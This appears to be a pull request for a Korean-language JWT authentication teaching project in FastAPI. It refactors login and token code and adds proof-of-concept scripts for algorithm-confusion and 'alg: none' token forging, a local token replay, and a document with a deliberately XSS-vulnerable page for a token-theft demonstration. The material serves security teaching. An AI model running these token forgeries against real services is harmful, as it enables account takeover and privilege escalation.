### PR TITLE
feat(security): Add JWT attack scenario scripts and docs

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -30,3 +30,6 @@ public_key.pem
 
 # 참고용 프로젝트 디렉토리 표시 파일
 tree.txt
+
+# Local demonstration/test files
+vulnerable_page.html

--- a/app/auth.py
+++ b/app/auth.py
@@ -4,35 +4,54 @@ from jose import jwt
 from passlib.context import CryptContext
 import os
 
+# SQLAlchemy 세션 및 모델 import 추가
+from sqlalchemy.orm import Session
+from . import models
+
+# --- 설정 ---
 SECRET_KEY = os.getenv("SECRET_KEY", "your_default_secret_key")
 ALGORITHM = "HS256"
-ACCESS_TOKEN_EXPIRE_MINUTES = 15
+ACCESS_TOKEN_EXPIRE_MINUTES = 30 
 REFRESH_TOKEN_EXPIRE_DAYS = 7
 
+# --- 비밀번호 해싱 ---
 pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
 
-def verify_password(plain_password, hashed_password):
+def verify_password(plain_password: str, hashed_password: str) -> bool:
+    """입력된 비밀번호와 해시된 비밀번호를 비교."""
     return pwd_context.verify(plain_password, hashed_password)
 
-def get_password_hash(password):
+def get_password_hash(password: str) -> str:
+    """비밀번호를 해시 처리."""
     return pwd_context.hash(password)
 
-def create_access_token(data: dict, expires_delta: Optional[timedelta] = None):
+# --- JWT 토큰 생성 ---
+def create_access_token(data: dict) -> str:
+    """Access Token을 생성."""
     to_encode = data.copy()
-    if expires_delta:
-        expire = datetime.utcnow() + expires_delta
-    else:
-        expire = datetime.utcnow() + timedelta(minutes=15)
+    expire = datetime.utcnow() + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
     to_encode.update({"exp": expire})
     encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
     return encoded_jwt
 
-def create_refresh_token(data: dict, expires_delta: Optional[timedelta] = None):
+def create_refresh_token(data: dict) -> str:
+    """Refresh Token을 생성."""
     to_encode = data.copy()
-    if expires_delta:
-        expire = datetime.utcnow() + expires_delta
-    else:
-        expire = datetime.utcnow() + timedelta(days=7)
+    expire = datetime.utcnow() + timedelta(days=REFRESH_TOKEN_EXPIRE_DAYS)
     to_encode.update({"exp": expire})
     encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
     return encoded_jwt
+
+# --- 사용자 인증 ---
+def authenticate_user(db: Session, email: str, password: str) -> Optional[models.User]:
+    """
+    이메일과 비밀번호로 사용자를 인증.
+    - DB에서 사용자를 찾아 비밀번호가 일치하는지 확인.
+    - 일치하면 사용자 모델 객체를, 아니면 None을 반환.
+    """
+    user = db.query(models.User).filter(models.User.email == email).first()
+    if not user:
+        return None
+    if not verify_password(password, user.hashed_password):
+        return None
+    return user

--- a/app/dependencies.py
+++ b/app/dependencies.py
@@ -3,23 +3,40 @@ from fastapi.security import OAuth2PasswordBearer, HTTPBearer, HTTPAuthorization
 from jose import JWTError, jwt
 from sqlalchemy.orm import Session
 
-from . import models, schemas, auth
+from . import models, auth, schemas
 from .db import SessionLocal
 
-# 기존 로그인 흐름을 위한 스키마
-oauth2_scheme = OAuth2PasswordBearer(tokenUrl="/auth/token")
+# --- Security Schemes ---
 
-# 수동 토큰 입력을 위한 새로운 스키마
+# 사용자 이름/비밀번호 form으로 로그인을 처리하는 Swagger UI를 위함
+# tokenUrl은 실제 로그인(토큰 발급) 경로와 일치해야 함
+oauth2_scheme = OAuth2PasswordBearer(tokenUrl="/auth/login")
+
+# Authorization: Bearer <token> 헤더에서 직접 토큰을 추출하기 위함
+# (주로 Refresh Token을 전달받을 때 사용)
 bearer_scheme = HTTPBearer()
 
+
+# --- Database Dependency ---
+
 def get_db():
+    """
+    각 API 요청에 대한 데이터베이스 세션을 생성, 요청 완료 후 세션을 닫음
+    """
     db = SessionLocal()
     try:
         yield db
     finally:
         db.close()
 
-def get_current_user_from_token(token: str, db: Session):
+
+# --- Authentication Dependencies ---
+
+def get_current_user_from_token(token: str, db: Session) -> models.User:
+    """
+    JWT 토큰을 디코딩, 검증하여 해당 사용자를 반환하는 핵심 함수.
+    Access Token과 Refresh Token 검증에 모두 재사용됩니다.
+    """
     credentials_exception = HTTPException(
         status_code=status.HTTP_401_UNAUTHORIZED,
         detail="Could not validate credentials",
@@ -38,22 +55,34 @@ def get_current_user_from_token(token: str, db: Session):
         raise credentials_exception
     return user
 
-# access_token을 사용하는 함수
-def get_current_user_from_access_token(token: str = Depends(oauth2_scheme), db: Session = Depends(get_db)):
+
+def get_current_user_from_access_token(
+    token: str = Depends(oauth2_scheme), 
+    db: Session = Depends(get_db)
+) -> models.User:
+    """
+    Access Token을 사용하여 현재 로그인된 사용자를 가져오는 의존성.
+    일반적으로 보호된 API 엔드포인트에서 사용됨
+    """
     return get_current_user_from_token(token, db)
 
-# refresh_token을 사용하는 함수
+
 def get_current_user_from_refresh_token(
-    token: HTTPAuthorizationCredentials = Depends(bearer_scheme), # 1. oauth2_scheme -> bearer_scheme으로 변경
+    token_credentials: HTTPAuthorizationCredentials = Depends(bearer_scheme),
     db: Session = Depends(get_db)
-):
-    # 2. token -> token.credentials로 변경 (HTTPBearer는 객체로 토큰을 전달)
-    user = get_current_user_from_token(token.credentials, db)
+) -> models.User:
+    """
+    Refresh Token을 사용하여 현재 사용자를 가져오는 의존성.
+    - 토큰 유효성 검증과 함께 DB에 저장된 토큰과 일치하는지 확인
+    - 주로 로그아웃, 토큰 재발급과 같은 작업에 사용됨
+    """
+    token = token_credentials.credentials
+    user = get_current_user_from_token(token, db)
     
     # DB에 저장된 Refresh Token과 일치하는지 확인
     stored_token = db.query(models.RefreshToken).filter(
         models.RefreshToken.user_id == user.id,
-        models.RefreshToken.token == token.credentials # 3. token -> token.credentials로 변경
+        models.RefreshToken.token == token
     ).first()
 
     if not stored_token:
@@ -62,3 +91,14 @@ def get_current_user_from_refresh_token(
             detail="Invalid or expired refresh token",
         )
     return user
+
+
+def get_new_access_token_from_refresh_token(
+    current_user: models.User = Depends(get_current_user_from_refresh_token)
+) -> str:
+    """
+    유효한 Refresh Token을 기반으로 새로운 Access Token을 생성하여 반환하는 의존성.
+    토큰 재발급 엔드포인트에서 사용됨
+    """
+    new_access_token = auth.create_access_token(data={"sub": current_user.email})
+    return new_access_token

--- a/app/main.py
+++ b/app/main.py
@@ -3,15 +3,24 @@ from . import models
 from .db import engine
 from .routes import auth, users
 
-# DB 테이블 생성
+# 애플리케이션 시작 시 DB 테이블 생성
 models.Base.metadata.create_all(bind=engine)
 
-app = FastAPI()
+# FastAPI 앱 인스턴스 생성
+app = FastAPI(
+    title="JWT Secure Auth API",
+    description="JWT 기반 인증 시스템 보안 강화 및 공격/방어 실습용 API",
+    version="1.0.0"
+)
 
-# 라우터 포함
+# 라우터 포함 
 app.include_router(auth.router)
 app.include_router(users.router)
 
-@app.get("/")
+# 루트 경로
+@app.get("/", tags=["Root"])
 def read_root():
-    return {"Hello": "World"}
+    """
+    API 서버의 루트 경로입니다. 서버가 정상적으로 실행 중인지 확인합니다.
+    """
+    return {"message": "Welcome to the JWT Secure Auth API!"}

--- a/app/routes/auth.py
+++ b/app/routes/auth.py
@@ -1,35 +1,62 @@
 from fastapi import APIRouter, Depends, HTTPException, status
 from fastapi.security import OAuth2PasswordRequestForm
 from sqlalchemy.orm import Session
-from datetime import timedelta
+from typing import Annotated
 
 from .. import schemas, models, auth, dependencies
 
+# 라우터에 직접 prefix와 tags를 설정
 router = APIRouter(
     prefix="/auth",
-    tags=["auth"]
+    tags=["Authentication"]
 )
 
-@router.post("/token", response_model=schemas.Token)
+@router.post("/signup", response_model=schemas.User, status_code=status.HTTP_201_CREATED)
+def signup(user: schemas.UserCreate, db: Session = Depends(dependencies.get_db)):
+    """
+    **[추가된 기능]** 새로운 사용자를 생성
+    - 이메일(username) 중복을 확인
+    - 비밀번호를 안전하게 해싱하여 저장
+    """
+    db_user = db.query(models.User).filter(models.User.email == user.email).first()
+    if db_user:
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail="Email already registered"
+        )
+    
+    hashed_password = auth.get_password_hash(user.password)
+    new_user = models.User(email=user.email, hashed_password=hashed_password)
+    
+    db.add(new_user)
+    db.commit()
+    db.refresh(new_user)
+    
+    return new_user
+
+
+@router.post("/login", response_model=schemas.Token)
 def login_for_access_token(
-    db: Session = Depends(dependencies.get_db),
-    form_data: OAuth2PasswordRequestForm = Depends()
+    form_data: Annotated[OAuth2PasswordRequestForm, Depends()],
+    db: Session = Depends(dependencies.get_db)
 ):
-    user = db.query(models.User).filter(models.User.email == form_data.username).first()
-    if not user or not auth.verify_password(form_data.password, user.hashed_password):
+    """
+    사용자 로그인 후 Access Token과 Refresh Token을 발급
+    - Refresh Token은 DB에 저장하여 관리
+    """
+    # form_data.username이 실제 이메일 주소
+    user = auth.authenticate_user(db, form_data.username, form_data.password)
+    if not user:
         raise HTTPException(
             status_code=status.HTTP_401_UNAUTHORIZED,
-            detail="Incorrect username or password",
+            detail="Incorrect email or password",
             headers={"WWW-Authenticate": "Bearer"},
         )
 
-    access_token = auth.create_access_token(
-        data={"sub": user.email}, expires_delta=timedelta(minutes=auth.ACCESS_TOKEN_EXPIRE_MINUTES)
-    )
-    refresh_token = auth.create_refresh_token(
-        data={"sub": user.email}, expires_delta=timedelta(days=auth.REFRESH_TOKEN_EXPIRE_DAYS)
-    )
+    access_token = auth.create_access_token(data={"sub": user.email})
+    refresh_token = auth.create_refresh_token(data={"sub": user.email})
 
+    # 기존 리프레시 토큰이 있으면 업데이트, 없으면 새로 생성
     db_token = db.query(models.RefreshToken).filter(models.RefreshToken.user_id == user.id).first()
     if db_token:
         db_token.token = refresh_token
@@ -38,30 +65,32 @@ def login_for_access_token(
         db.add(db_token)
     db.commit()
 
-    return {"access_token": access_token, "refresh_token": refresh_token, "token_type": "bearer"}
+    return {
+        "access_token": access_token, 
+        "refresh_token": refresh_token, 
+        "token_type": "bearer"
+    }
 
-@router.post(
-    "/token/refresh", 
-    response_model=schemas.Token,
-    dependencies=[Depends(dependencies.get_current_user_from_refresh_token)]
-)
+
+@router.post("/refresh", response_model=schemas.AccessToken)
 def refresh_access_token(
-    current_user: models.User = Depends(dependencies.get_current_user_from_refresh_token),
+    new_access_token: str = Depends(dependencies.get_new_access_token_from_refresh_token)
 ):
-    new_access_token = auth.create_access_token(
-        data={"sub": current_user.email},
-        expires_delta=timedelta(minutes=auth.ACCESS_TOKEN_EXPIRE_MINUTES)
-    )
+    """
+    유효한 Refresh Token을 사용하여 새로운 Access Token을 발급받음
+    """
     return {"access_token": new_access_token, "token_type": "bearer"}
 
-@router.post(
-    "/logout",
-    dependencies=[Depends(dependencies.get_current_user_from_refresh_token)]
-)
+
+@router.post("/logout")
 def logout(
     db: Session = Depends(dependencies.get_db),
+    # `get_current_user...` 의존성은 토큰 유효성 검사 역할도 수행
     current_user: models.User = Depends(dependencies.get_current_user_from_refresh_token)
 ):
+    """
+    로그아웃 처리. DB에 저장된 사용자의 Refresh Token을 삭제
+    """
     db_token = db.query(models.RefreshToken).filter(models.RefreshToken.user_id == current_user.id).first()
     if db_token:
         db.delete(db_token)

--- a/app/routes/users.py
+++ b/app/routes/users.py
@@ -1,26 +1,17 @@
-from fastapi import APIRouter, Depends, HTTPException
+from fastapi import APIRouter, Depends
 from sqlalchemy.orm import Session
 
-from .. import models, schemas, auth, dependencies
+from .. import models, schemas, dependencies
 
 router = APIRouter(
     prefix="/users",
-    tags=["users"]
+    tags=["Users"] 
 )
 
-@router.post("/", response_model=schemas.User)
-def create_user(user: schemas.UserCreate, db: Session = Depends(dependencies.get_db)):
-    db_user = db.query(models.User).filter(models.User.email == user.email).first()
-    if db_user:
-        raise HTTPException(status_code=400, detail="Email already registered")
-    
-    hashed_password = auth.get_password_hash(user.password)
-    new_user = models.User(email=user.email, hashed_password=hashed_password)
-    db.add(new_user)
-    db.commit()
-    db.refresh(new_user)
-    return new_user
-
-@router.get("/me/", response_model=schemas.User)
+@router.get("/me", response_model=schemas.User)
 def read_users_me(current_user: models.User = Depends(dependencies.get_current_user_from_access_token)):
+    """
+    현재 로그인된 사용자의 정보를 반환
+    - 요청 헤더의 Access Token을 검증하여 사용자를 식별
+    """
     return current_user

--- a/app/schemas.py
+++ b/app/schemas.py
@@ -1,21 +1,36 @@
 from pydantic import BaseModel, EmailStr
 from typing import Optional
 
-# User
+# --- User Schemas ---
+
 class UserBase(BaseModel):
+    """사용자 정보의 기본이 되는 스키마"""
     email: EmailStr
 
 class UserCreate(UserBase):
+    """사용자 생성을 위한 스키마 (비밀번호 포함)"""
     password: str
 
 class User(UserBase):
+    """DB에서 조회한 사용자 정보를 반환하기 위한 스키마"""
     id: int
+    is_active: bool = True
 
     class Config:
+        # SQLAlchemy 모델과 Pydantic 모델을 매핑하기 위한 설정
         from_attributes = True
 
-# Token
-class Token(BaseModel):
+# --- Token Schemas ---
+
+class TokenData(BaseModel):
+    """JWT 토큰의 payload에 담기는 데이터를 위한 스키마"""
+    email: Optional[str] = None
+
+class AccessToken(BaseModel):
+    """Access Token 재발급 시 사용되는 응답 스키마"""
     access_token: str
-    token_type: str
-    refresh_token: Optional[str] = None
+    token_type: str = "bearer"
+
+class Token(AccessToken):
+    """로그인 시 발급되는 전체 토큰(Access + Refresh)을 위한 스키마"""
+    refresh_token: str

--- a/attacks/alg_confusion_poc.py
+++ b/attacks/alg_confusion_poc.py
@@ -1,0 +1,83 @@
+import jwt
+import os
+import json
+import base64
+import hmac
+import hashlib
+from datetime import datetime, timedelta
+
+def scenario_description():
+    """공격 시나리오를 터미널에 출력."""
+    print("="*50)
+    print("⚔️ 공격 시나리오: 알고리즘 혼동 (Algorithm Confusion Attack)")
+    print("="*50)
+    print("이 공격은 서버가 RS256(비대칭키)과 HS256(대칭키)을 모두 지원하면서,")
+    print("토큰의 알고리즘('alg' 헤더)에 따라 검증 로직을 유연하게 변경할 때 발생할 수 있습니다.")
+    print("\n1. 서버는 RS256 검증을 위해 'Public Key'를 외부에 공개합니다.")
+    print("2. 공격자는 이 Public Key를 획득합니다.")
+    print("3. 공격자는 토큰 헤더의 'alg'를 'HS256'으로 변경하고, 페이로드를 'admin' 권한으로 위조합니다.")
+    print("4. 서명 시, **RS256의 Public Key를 HS256의 비밀 키(Secret Key)처럼 사용**하여 서명합니다.")
+    print("5. 서버는 'alg'가 HS256이므로 Public Key를 비밀 키로 착각하여 서명을 검증하고, 공격은 성공합니다.")
+    print("-" * 50)
+
+def base64url_encode(data):
+    """데이터를 Base64URL 형식으로 인코딩합니다."""
+    return base64.urlsafe_b64encode(data).rstrip(b"=")
+
+def run_poc():
+    """개념 증명(Proof of Concept) 코드를 실행."""
+    # 1. 공격자가 서버의 RS256 공개키를 획득했다고 가정
+    public_key_path = "public_key.pem"
+    if not os.path.exists(public_key_path):
+        print(f"[ERROR] '{public_key_path}' not found.")
+        print("Please generate RSA keys first using the OpenSSL commands mentioned below.")
+        return
+
+    with open(public_key_path, "rb") as f:
+        public_key = f.read()
+
+    print(f"[INFO] 1. Attacker obtained the server's public key:\n{public_key.decode(errors='ignore')[:70]}...\n")
+
+    # 2. 'admin' 권한을 가진 위조된 페이로드 생성 (sub를 이메일 형식으로 수정)
+    header = {"alg": "HS256", "typ": "JWT"}
+    malicious_payload = {
+        "sub": "admin@example.com",
+        "role": "super-admin",
+        "exp": int((datetime.utcnow() + timedelta(days=365)).timestamp())
+    }
+    print(f"[INFO] 2. Crafting malicious payload:\n{malicious_payload}\n")
+    
+    # 3. 헤더의 alg를 HS256으로, 페이로드는 위조 내용으로, 서명은 공개키로
+    # PyJWT 라이브러리의 보안 검사를 우회하기 위해 토큰을 수동으로 생성.
+    json_header = json.dumps(header, separators=(",", ":")).encode('utf-8')
+    json_payload = json.dumps(malicious_payload, separators=(",", ":")).encode('utf-8')
+
+    encoded_header = base64url_encode(json_header)
+    encoded_payload = base64url_encode(json_payload)
+
+    signing_input = encoded_header + b"." + encoded_payload
+    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
+    encoded_signature = base64url_encode(signature)
+
+    forged_token = (encoded_header + b"." + encoded_payload + b"." + encoded_signature).decode('utf-8')
+    
+    print(f"[SUCCESS] 3. Forged JWT token generated:\n{forged_token}\n")
+
+    print("[CONCLUSION] 이 토큰을 서버로 보내면, 서버의 검증 로직이 취약할 경우 admin 권한을 탈취할 수 있습니다.")
+    print("   -> 5주차에서 'RS256 알고리즘 강제 및 올바른 키 사용'으로 방어할 것입니다.")
+    
+    # (참고) 취약한 서버에서의 검증 시뮬레이션
+    try:
+        decoded_payload = jwt.decode(forged_token, key=public_key, algorithms=["HS256"])
+        print("\n[SIMULATION] Server (vulnerable) decodes the token successfully:")
+        print(decoded_payload)
+    except Exception as e:
+        print(f"\n[SIMULATION] Decoding failed unexpectedly: {e}")
+
+if __name__ == "__main__":
+    # 이 PoC를 실행하려면 먼저 RS256 키 쌍이 필요.
+    # 터미널에서 아래 명령어로 키를 생성.
+    # > openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:2048
+    # > openssl rsa -pubout -in private_key.pem -out public_key.pem
+    scenario_description()
+    run_poc()

--- a/attacks/alg_none_poc.py
+++ b/attacks/alg_none_poc.py
@@ -1,0 +1,61 @@
+import json
+import base64
+
+# PyJWT는 검증 시뮬레이션에만 사용
+import jwt
+
+def scenario_description():
+    """공격 시나리오를 터미널에 출력."""
+    print("="*50)
+    print("⚔️ 공격 시나리오: 'alg: none' 서명 무력화 공격")
+    print("="*50)
+    print("JWT 표준은 서명 없이도 토큰을 사용할 수 있도록 'none' 알고리즘을 지원합니다.")
+    print("만약 서버가 이 알고리즘을 비활성화하지 않았다면, 공격자는 서명을 제거한 위조 토큰을 보낼 수 있습니다.")
+    print("\n1. 공격자는 유효한 토큰의 구조를 파악합니다.")
+    print("2. 공격자는 헤더의 'alg' 값을 'none'으로 변경하고, 원하는 내용으로 페이로드를 위조합니다.")
+    print("3. 서명(Signature) 부분을 비워둔 채로 토큰을 서버에 전송합니다.")
+    print("4. 'none' 알고리즘을 허용하는 취약한 서버는 서명 검증 없이 페이로드 내용을 신뢰하게 됩니다.")
+    print("-" * 50)
+
+def base64url_encode(data):
+    """데이터를 Base64URL 형식으로 인코딩."""
+    return base64.urlsafe_b64encode(data).rstrip(b"=")
+
+def run_poc():
+    """개념 증명(Proof of Concept) 코드를 실행."""
+    # 1. 악의적인 헤더와 페이로드 생성
+    header = {"alg": "none", "typ": "JWT"}
+    malicious_payload = {
+        "sub": "super_admin@example.com",
+        "role": "admin",
+        "is_premium": True
+    }
+    print(f"[INFO] 1. 악의적인 헤더 및 페이로드 생성:\nHeader: {header}\nPayload: {malicious_payload}\n")
+
+    # 2. 토큰의 각 부분을 인코딩
+    json_header = json.dumps(header, separators=(",", ":")).encode('utf-8')
+    json_payload = json.dumps(malicious_payload, separators=(",", ":")).encode('utf-8')
+
+    encoded_header = base64url_encode(json_header)
+    encoded_payload = base64url_encode(json_payload)
+
+    # 3. 서명 부분을 의도적으로 비워서 토큰 조립
+    # 형식: encoded_header.encoded_payload. 
+    forged_token = (encoded_header + b"." + encoded_payload + b".").decode('utf-8')
+
+    print(f"[SUCCESS] 2. 'alg:none' 토큰이 생성되었습니다:\n{forged_token}\n")
+    print("[CONCLUSION] 이 토큰은 서명이 없지만, 'none' 알고리즘을 허용하는 서버에서는 유효한 것으로 처리될 수 있습니다.")
+    print("   -> 최신 JWT 라이브러리는 기본적으로 'none' 알고리즘을 허용하지 않습니다.")
+
+    # (참고) 취약한 서버에서의 검증 시뮬레이션
+    try:
+        # 'none' 알고리즘을 허용하도록 명시해야만 PyJWT가 디코딩을 시도.
+        decoded_payload = jwt.decode(forged_token, options={"verify_signature": False})
+        print("\n[SIMULATION] 'none'을 허용하는 취약한 서버가 토큰을 성공적으로 디코딩했습니다:")
+        print(decoded_payload)
+    except Exception as e:
+        print(f"\n[SIMULATION] 디코딩이 예기치 않게 실패했습니다: {e}")
+
+if __name__ == "__main__":
+    scenario_description()
+    run_poc()

--- a/attacks/token_replay.py
+++ b/attacks/token_replay.py
@@ -1,0 +1,77 @@
+import requests
+import time
+
+# --- 설정 ---
+BASE_URL = "http://127.0.0.1:8000"
+# API 라우터에 설정된 prefix 경로
+AUTH_PREFIX = "/auth"
+USERS_PREFIX = "/users"
+
+# 'username' 키를 'email'로 변경하고, 값도 유효한 이메일 형식으로 수정.
+TEST_USER = {
+    "email": f"attacker_{int(time.time())}@test.com",
+    "password": "strongpassword"
+}
+
+def scenario_description():
+    """공격 시나리오를 터미널에 출력"""
+    print("="*50)
+    print("⚔️ 공격 시나리오: 토큰 재사용 (Token Replay Attack)")
+    print("="*50)
+    print("1. 공격자는 정상적인 방법으로 사용자 계정을 생성하고 로그인합니다.")
+    print("2. 네트워크 트래픽 감청, 클라이언트 저장소(LocalStorage) 해킹 등의 방법으로")
+    print("   피해자의 Access Token을 탈취했다고 가정합니다.")
+    print("3. 공격자는 탈취한 토큰을 그대로 사용하여 보호된 API에 접근을 시도합니다.")
+    print("4. 현재 시스템은 토큰의 유효기간과 서명만 검증하므로, 이 공격은 성공합니다.")
+    print("-" * 50)
+
+def run_attack():
+    """공격 시나리오를 순서대로 실행."""
+    session = requests.Session()
+
+    # 1. 공격자 계정 생성
+    signup_url = f"{BASE_URL}{AUTH_PREFIX}/signup"
+    print(f"[INFO] 1. Creating attacker account via: {signup_url}")
+    try:
+        # 수정된 TEST_USER 딕셔너리를 json으로 전송.
+        response = session.post(signup_url, json=TEST_USER)
+        response.raise_for_status()
+        print(f"[SUCCESS] Account created. Status: {response.status_code}")
+    except requests.exceptions.RequestException as e:
+        print(f"[FAIL] Account creation failed: {e}")
+        return
+
+    # 2. 공격자 로그인 및 토큰 획득
+    login_url = f"{BASE_URL}{AUTH_PREFIX}/login"
+    print(f"\n[INFO] 2. Logging in to get a valid token via: {login_url}")
+    try:
+        # 로그인 form의 'username' 필드에는 방금 생성한 사용자의 'email'을 값으로 사용.
+        login_data = {"username": TEST_USER["email"], "password": TEST_USER["password"]}
+        response = session.post(login_url, data=login_data)
+        response.raise_for_status()
+        tokens = response.json()
+        stolen_access_token = tokens.get("access_token")
+        print(f"[SUCCESS] Token stolen: {stolen_access_token[:30]}...")
+    except requests.exceptions.RequestException as e:
+        print(f"[FAIL] Login failed: {e}")
+        return
+
+    # 3. 탈취한 토큰으로 보호된 API 접근 시도
+    protected_url = f"{BASE_URL}{USERS_PREFIX}/me"
+    print(f"\n[INFO] 3. Attacking protected endpoint with the stolen token via: {protected_url}")
+    headers = {"Authorization": f"Bearer {stolen_access_token}"}
+    try:
+        response = session.get(protected_url, headers=headers)
+        response.raise_for_status()
+        print("[SUCCESS] Attack successful! We accessed the protected data:")
+        print(f"   Response Status: {response.status_code}")
+        print(f"   Response Body: {response.json()}")
+    except requests.exceptions.RequestException as e:
+        print(f"[FAIL] Attack failed: {e}")
+    
+    print("\n[CONCLUSION] 토큰이 유효하기만 하다면 누구든, 어디서든 사용할 수 있는 상태입니다.")
+    print("   -> 5주차에서 '로그아웃 시 토큰 무효화(Blacklist)'로 이를 방어할 것입니다.")
+
+if __name__ == "__main__":
+    scenario_description()
+    run_attack()

--- a/docs/steal_via_xss_demo.md
+++ b/docs/steal_via_xss_demo.md
@@ -1,0 +1,46 @@
+# XSS를 통한 토큰 탈취 시연 절차 (개념 증명)
+
+> **경고**: 이 문서는 교육 목적으로 작성되었으며, 설명된 모든 절차는 **반드시 통제된 로컬 개발 환경에서만** 수행해야 합니다. 실제 서비스에 절대로 시도해서는 안 됩니다.
+
+## 1. XSS란?
+
+XSS (Cross-Site Scripting)는 공격자가 웹 애플리케이션에 악성 스크립트를 삽입하여, 다른 사용자의 브라우저에서 해당 스크립트가 실행되게 하는 공격입니다. 만약 웹사이트가 사용자의 입력을 제대로 검증(Sanitization)하지 않고 그대로 페이지에 표시한다면 XSS 공격에 매우 취약해집니다.
+
+## 2. `LocalStorage`와 토큰 탈취 시나리오
+
+1.  **피해자**는 정상적으로 서비스에 로그인하고, 브라우저의 `LocalStorage`에 Access Token을 저장합니다. (`LocalStorage`는 JavaScript로 자유롭게 접근이 가능합니다.)
+2.  **공격자**는 XSS 취약점이 있는 게시판이나 검색창에 악성 스크립트가 포함된 게시물/댓글을 작성합니다.
+    -   이 스크립트의 역할: "현재 페이지의 `LocalStorage`에서 `access_token` 항목을 읽어서, 공격자의 서버로 전송하라."
+3.  **피해자**가 공격자의 악성 스크립트가 포함된 페이지를 열람합니다.
+4.  피해자의 브라우저는 페이지를 렌더링하다가 공격자가 심어놓은 스크립트를 아무 의심 없이 실행합니다.
+5.  스크립트는 피해자의 토큰을 성공적으로 탈취하여 공격자에게 몰래 전송합니다.
+6.  공격자는 탈취한 토큰을 사용하여 `token_replay.py`에서처럼 피해자 행세를 하며 보호된 API에 접근합니다.
+
+## 3. 로컬 환경에서 간단 시연
+
+### `vulnerable_page.html` 작성
+```html
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>XSS Vulnerable Page</title>
+</head>
+<body>
+    <h1>검색 결과</h1>
+    <p>
+        "<strong></strong>"에 대한 검색 결과가 없습니다.
+    </p>
+
+    <script>
+        // URL에서 'query' 파라미터를 가져와서 페이지에 그대로 출력 (XSS 취약점의 원인!)
+        const urlParams = new URLSearchParams(window.location.search);
+        const query = urlParams.get('query');
+        
+        // innerHTML을 사용해 HTML 파싱을 허용하면 스크립트가 실행될 수 있습니다.
+        if (query) {
+            document.querySelector('strong').innerHTML = query; 
+        }
+    </script>
+</body>
+</html>


### PR DESCRIPTION
This commit adds a suite of scripts and documentation to demonstrate common JWT vulnerabilities.

- Add token replay attack script
- Add algorithm confusion (HS256/RS256) PoC
- Add 'alg: none' attack PoC
- Add documentation for XSS token hijacking